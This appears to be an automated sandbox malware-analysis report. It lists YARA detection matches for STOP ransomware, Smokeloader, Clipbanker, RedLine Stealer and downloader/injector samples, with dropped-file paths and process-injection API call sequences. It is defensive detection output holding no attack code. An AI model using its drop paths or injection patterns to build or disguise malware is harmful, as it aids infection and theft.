Source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000004.00000002.445509996.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.450548636.0000000002490000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001B.00000002.490286812.0000000002380000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.380107918.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.442702951.00000000024A5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000022.00000002.482578416.0000000000887000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 2560, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 772, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 1340, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 128, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: B46F.exe PID: 4928, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: B46F.exe PID: 2576, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A170.exe PID: 1868, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: D804.exe PID: 1264, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: C:\Users\user\AppData\Local\Temp\9F31.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: C:\Users\user\AppData\Local\Temp\3C54.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: C:\Users\user\AppData\Local\Temp\6FA9.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: String function: 00407404 appears 35 times

Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,

